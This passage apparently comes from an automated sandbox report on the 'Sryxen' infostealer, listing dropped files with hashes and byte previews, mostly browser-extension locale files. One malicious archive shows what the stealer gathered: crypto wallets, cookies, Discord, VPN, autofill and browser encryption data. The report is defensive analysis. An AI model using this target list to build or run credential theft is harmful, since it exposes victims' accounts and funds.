                                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...qiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628" xmpMM:DocumentID="xmp.did:91EA24D7191011E5B1FF9488C51C29D1" xmpMM:InstanceID="xmp.iid:91EA24D6191011E5B1FF9488C51C29D1" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6a6b844a-8117-4c4c-9b2f-30d3769ed7c7" stRef:documentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^.i.....IDATx.bb .0..;./..;@...A.P9F...y

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2452
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.474245883105005
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:963xND4Rft3CtYS4F4QdkLQC81juAox1H537+3qhR1nyN4SXTncoJe921Hf3qSt:IxiDXKHB6PzlH/nt
                                                                                                                                                                                                                                                                                                MD5:6B7210F905A82875CA930BDDD4D0027F
                                                                                                                                                                                                                                                                                                SHA1:880ABC34F18C21BD019DE2D96B0F35F5D5499B8B
                                                                                                                                                                                                                                                                                                SHA-256:8E118E9A2F9469F2A5177B727078A3C1C1C09848BA24E424409220790E07D3FD
                                                                                                                                                                                                                                                                                                SHA-512:CDE47B1BEA28F995A5418E75190AB4FC204CEEEF53A9D52AEE8446DC2BF3C5326C78641D7B58E503B4E033B023D3A996F015DDF6630B3EE6667776F204FDED01
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Preview:PK..........hZ................Sryxen\Cryptowallets\PK..........hZ................Sryxen\Games\PK..........hZ................Sryxen\Socials\PK..........hZ................Sryxen\VPN\PK........k.hZ................Sryxen\autofill.txtPK........k.hZ...!...........Sryxen\bookmarks.txt..MO.0......&8d.+l0.L...3..J..TM.(qV._O7.c..........k+C.....3.....".q&DL.c...ue..b(...SAQ,..K.f...A....v.e..xz5..F........m.......V..gx....(..\%"t.K.9!.%C.'...S( ..T.&B.lJ.t.l.a).!.:..-..zY...-=....B....R.4..l....i.....[<.*7='.T.....t...'.{.z..bM..{.w".O..u.......z.G9/.*i.`..[..PK........q.hZ................Sryxen\chrome_abe.txtPK........q.hZx.V.}...........Sryxen\console_log.txtu.M..@....w..z.....0.+]d.T.FG...."....}.g<..0.n..A0%.8..1m7....,.0....h.gV]Z)..>.!N..!..pe.....bs].r.J..*...g.....Yo.7PK........m.hZ................Sryxen\cookies.txtPK........k.hZ................Sryxen\discord.txtPK........q.hZr...;...;.......Sryxen\edge_abe.txt...s...p....K-.....Up*.//N-R.K-*...R044.3.3201.3.065.)..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\kK5W5eY.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8616778647394084
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                MD5:BDDE4AD11E732420E7ABCCA946B11611
                                                                                                                                                                                                                                                                                                SHA1:278C3386A37BAFCA507CF4C128600B01B312DDA0
                                                                                                                                                                                                                                                                                                SHA-256:099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
                                                                                                                                                                                                                                                                                                SHA-512:B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\mBCHLzs.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3046000, file counter 6, database pages 41, 1st free page 29, free pages 1, cookie 0x25, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4792253015780342
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:xWpdkG7xQ+ALqL/uejzH+bF+UIYysX0lj/twfLyl0e9S8E:ApdkG77IqL/tH+bF+UI3i67Kylj9
                                                                                                                                                                                                                                                                                                MD5:33642526D21BAF34FB5D5AAF11B3FB91
                                                                                                                                                                                                                                                                                                SHA1:A64B4A7605D8B449C085474A3484921975EF6C14
                                                                                                                                                                                                                                                                                                SHA-256:3ED06184837C7FF625C54589CA2037F127E0525E3541DE8960A9D5503625862B
                                                                                                                                                                                                                                                                                                SHA-512:A013359FCBAC1005653793D3FF6398E32746E2F6FFCDA26AA3C9EB96279F7A2E989E05B5B8D2510EAF5F93DDD6281A71773DA81C472FCC71AD74315353948782
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......)...........%......................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\1522e357-e69a-4298-b30e-55c103916e1f.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):154545
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.839678617100523
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:zZH5WPD5SqCJryow8AWTtwGrasOQNHjWRKnvXTwL:zpIPFCXjAWTtwGusOWmMvjwL
                                                                                                                                                                                                                                                                                                MD5:EAE462C55EBA847A1A8B58E58976B253
                                                                                                                                                                                                                                                                                                SHA1:4D7C9D59D6AE64EB852BD60B48C161125C820673
                                                                                                                                                                                                                                                                                                SHA-256:EBCDA644BCFBD0C9300227BAFDE696E8923DDB004B4EE619D7873E8A12EAE2AD
                                                                                                                                                                                                                                                                                                SHA-512:494481A98AB6C83B16B4E8D287D85BA66499501545DA45458ACC395DA89955971CF2A14E83C2DA041C79C580714B92B9409AA14017A16D0B80A7FF3D91BAD2A3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...................h...|..=.Ih.\...T.....}..u0...HVND......R....~D.H$9w._2.3.2...5.H.V.@....k;..c.V.7s....9o`_3qP{}....*.G....5.:.m..]..:.w|'..lG.../..,...G....g...O..}....K.Hk......T>..F7G.!n..h.j...J...XzbG..*..kK]!z..;.K.U.......1:..7w.....6...N.I!....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!...j9%2/.....(-.C.....].=....I.a..!......k..,i.....T.m.xM.W4.)`0..6R".%............m..8.....|.#......`..L0~..F-....B%.Bh.......H....R..~...Z....7Q...y....?.....[......t........J.R^....o....?.%....3h...8.....e..0.v..33.Si...._....3.d.S...Y....b.....O.s$......~...)l..g._.);.S.......yn@.....3iG.).I76.]..].t_..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):908
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):930
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):913
